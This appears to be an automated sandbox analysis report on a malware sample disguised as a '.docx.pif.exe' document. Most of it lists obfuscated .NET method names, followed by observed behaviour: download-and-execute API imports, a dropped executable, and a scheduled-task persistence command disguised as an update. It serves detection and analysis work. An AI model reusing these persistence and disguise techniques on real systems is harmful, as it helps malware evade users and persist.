Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, DWbfV733wDM7SoPHEF6.cs	High entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, qKcUIQWYkr2kHlVcDF.cs	High entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, v0UVJv4Fuk8ZSL2f7F.cs	High entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, ALpl925dRu9MqQXKDu.cs	High entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, fJAQuF3YIVEeN8MhNPj.cs	High entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, icvX8XzjLawXkxgs9u.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, EyMqHCPs9E9FenpsLm.cs	High entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, sXXw773dDD510lc6jEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, DqQ9hFBLg85nfpHLYg.cs	High entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, xOjHSwE9BsL66jh6xb.cs	High entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, spQoUaHnJ5qLMKORun.cs	High entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, SiNRcVkQKnvrVZtVoQ.cs	High entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, xo5PZY2ot5o5nvQbi0.cs	High entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, RdIWAaqWmQBYJZJocJ.cs	High entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, fspkOWvogMOU36TAoN.cs	High entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, s1uhC0LTpfAvYaiZjt.cs	High entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, SgBrdEKGapRfKEKkNh.cs	High entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, OpOgmCw6PPUf8olH7e.cs	High entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, oxcyjc1LDHjoCrebX9.cs	High entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, mtvXm3uIEAO1aOMiyD.cs	High entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, wOvN8bjY05qG3h2W8d.cs	High entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	High entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, PenYE0tkOYCLDqwRMy.cs	High entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, DWbfV733wDM7SoPHEF6.cs	High entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, qKcUIQWYkr2kHlVcDF.cs	High entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, v0UVJv4Fuk8ZSL2f7F.cs	High entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, ALpl925dRu9MqQXKDu.cs	High entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, fJAQuF3YIVEeN8MhNPj.cs	High entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, icvX8XzjLawXkxgs9u.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, EyMqHCPs9E9FenpsLm.cs	High entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, sXXw773dDD510lc6jEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, DqQ9hFBLg85nfpHLYg.cs	High entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, xOjHSwE9BsL66jh6xb.cs	High entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, spQoUaHnJ5qLMKORun.cs	High entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, SiNRcVkQKnvrVZtVoQ.cs	High entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, xo5PZY2ot5o5nvQbi0.cs	High entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, RdIWAaqWmQBYJZJocJ.cs	High entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, fspkOWvogMOU36TAoN.cs	High entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, s1uhC0LTpfAvYaiZjt.cs	High entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, SgBrdEKGapRfKEKkNh.cs	High entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, OpOgmCw6PPUf8olH7e.cs	High entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, oxcyjc1LDHjoCrebX9.cs	High entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, mtvXm3uIEAO1aOMiyD.cs	High entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, wOvN8bjY05qG3h2W8d.cs	High entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs	High entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, PenYE0tkOYCLDqwRMy.cs	High entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, DWbfV733wDM7SoPHEF6.cs	High entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, qKcUIQWYkr2kHlVcDF.cs	High entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, v0UVJv4Fuk8ZSL2f7F.cs	High entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, ALpl925dRu9MqQXKDu.cs	High entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, fJAQuF3YIVEeN8MhNPj.cs	High entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, icvX8XzjLawXkxgs9u.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, EyMqHCPs9E9FenpsLm.cs	High entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, sXXw773dDD510lc6jEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, DqQ9hFBLg85nfpHLYg.cs	High entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, xOjHSwE9BsL66jh6xb.cs	High entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, spQoUaHnJ5qLMKORun.cs	High entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, SiNRcVkQKnvrVZtVoQ.cs	High entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, xo5PZY2ot5o5nvQbi0.cs	High entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, RdIWAaqWmQBYJZJocJ.cs	High entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, fspkOWvogMOU36TAoN.cs	High entropy of concatenated method names: 'tAFm3abwfM', 'MdQmd7WPix', 'zKXmHgWhfm', 'BtgmgIq9iP', 'HBwmWhy1lP', 'nLUmnbxyYJ', 'LMimiFeyPP', 'dK1yGqRw0L', 'gr8yjHqQF7', 'KAuyB7pl29'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, s1uhC0LTpfAvYaiZjt.cs	High entropy of concatenated method names: 'ToString', 'TaSSJOUJdB', 'dToSNfMl8Q', 'hy7SQ70x57', 'jWAShpYpHZ', 'RwDS6eNviQ', 'Ts3S5WRtih', 'QIDSPoU7gc', 'TN6SrEtM3L', 'o9KS2mg7Nm'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, SgBrdEKGapRfKEKkNh.cs	High entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, OpOgmCw6PPUf8olH7e.cs	High entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

15_2_00406EB0

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

File created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

15_2_0041AA4A

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
